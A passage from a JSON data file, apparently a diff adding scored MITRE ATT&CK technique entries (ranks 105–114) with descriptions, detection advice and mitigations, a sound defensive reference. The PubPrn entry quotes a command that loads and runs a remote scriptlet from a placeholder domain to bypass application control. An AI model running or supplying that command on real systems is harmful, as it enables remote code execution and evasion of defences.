Port Knocking", + "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\nThis technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.", + "url": "https://attack.mitre.org/techniques/T1205/001", + "detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + } + ] + }, + { + "rank": 105, + "tid": "T1538", + "name": "Cloud Service Dashboard", + "description": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.", + "url": "https://attack.mitre.org/techniques/T1538", + "detection": "Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)", + "score": 0.6681238095238096, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "subtechniques": [] + }, + { + "rank": 106, + "tid": "T1080", + "name": "Taint Shared Content", + "description": "Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses Shortcut Modification of directory .LNK files that use Masquerading to look like the real directories, which are hidden through Hidden Files and Directories. The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.", + "url": "https://attack.mitre.org/techniques/T1080", + "detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.", + "score": 0.662187211904762, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + } + ], + "subtechniques": [] + }, + { + "rank": 107, + "tid": "T1091", + "name": "Replication Through Removable Media", + "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.", + "url": "https://attack.mitre.org/techniques/T1091", + "detection": "Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.", + "score": 0.6583702366666667, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1034", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "url": "https://attack.mitre.org/mitigations/M1034" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ], + "subtechniques": [] + }, + { + "rank": 108, + "tid": "T1135", + "name": "Network Share Discovery", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) Net can be used to query a remote system for available shared drives using the net view \\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.", + "url": "https://attack.mitre.org/techniques/T1135", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.6370712918352381, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ], + "subtechniques": [] + }, + { + "rank": 109, + "tid": "T1212", + "name": "Exploitation for Credential Access", + "description": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.", + "url": "https://attack.mitre.org/techniques/T1212", + "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.", + "score": 0.6333333333333333, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1019", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "url": "https://attack.mitre.org/mitigations/M1019" + }, + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [] + }, + { + "rank": 110, + "tid": "T1602", + "name": "Data from Configuration Repository", + "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "url": "https://attack.mitre.org/techniques/T1602", + "detection": "Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "score": 0.6309523809523809, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "subtechniques": [ + { + "tid": "T1602.001", + "name": "Data from Configuration Repository: SNMP (MIB Dump)", + "description": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) ", + "url": "https://attack.mitre.org/techniques/T1602/001", + "detection": "Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1602.002", + "name": "Data from Configuration Repository: Network Device Configuration Dump", + "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ", + "url": "https://attack.mitre.org/techniques/T1602/002", + "detection": "Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)", + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + } + ] + }, + { + "rank": 111, + "tid": "T1216", + "name": "Signed Script Proxy Execution", + "description": "Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)", + "url": "https://attack.mitre.org/techniques/T1216", + "detection": "Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.", + "score": 0.6298512038095239, + "network_score": 0.2, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ], + "subtechniques": [ + { + "tid": "T1216.001", + "name": "Signed Script Proxy Execution: PubPrn", + "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).", + "url": "https://attack.mitre.org/techniques/T1216/001", + "detection": "Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + } + ] + }, + { + "rank": 112, + "tid": "T1599", + "name": "Network Boundary Bridging", + "description": "Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via Multi-hop Proxy or exfiltration of data via Traffic Duplication. In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.", + "url": "https://attack.mitre.org/techniques/T1599", + "detection": "Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question. Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.\nMonitor the border network device’s configuration to validate that the policy enforcement sections are what was intended. Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.", + "score": 0.6250047619047618, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + } + ], + "subtechniques": [ + { + "tid": "T1599.001", + "name": "Network Boundary Bridging: Network Address Translation Traversal", + "description": "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. \nAdversaries may use Patch System Image to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities", + "url": "https://attack.mitre.org/techniques/T1599/001", + "detection": "Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary.\nMonitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + } + ] + } + ] + }, + { + "rank": 113, + "tid": "T1114", + "name": "Email Collection", + "description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ", + "url": "https://attack.mitre.org/techniques/T1114", + "detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.", + "score": 0.6095238095238096, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [ + { + "tid": "T1114.001", + "name": "Email Collection: Local Email Collection", + "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in C:\\Users\\<username>\\Documents\\Outlook Files or C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook.(Citation: Microsoft Outlook Files)", + "url": "https://attack.mitre.org/techniques/T1114/001", + "detection": "Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + }, + { + "tid": "T1114.002", + "name": "Email Collection: Remote Email Collection", + "description": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as MailSniper can be used to automate searches for specific keywords.", + "url": "https://attack.mitre.org/techniques/T1114/002", + "detection": "Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + }, + { + "tid": "T1114.003", + "name": "Email Collection: Email Forwarding Rule", + "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)", + "url": "https://attack.mitre.org/techniques/T1114/003", + "detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + } + ] + }, + { + "rank": 114, + "tid": "T1518", + "name": "Software Discovery", + "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to Exploitation for Privilege Escalation.", + "url": "https://attack.mitre.org/techniques/T1518", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools 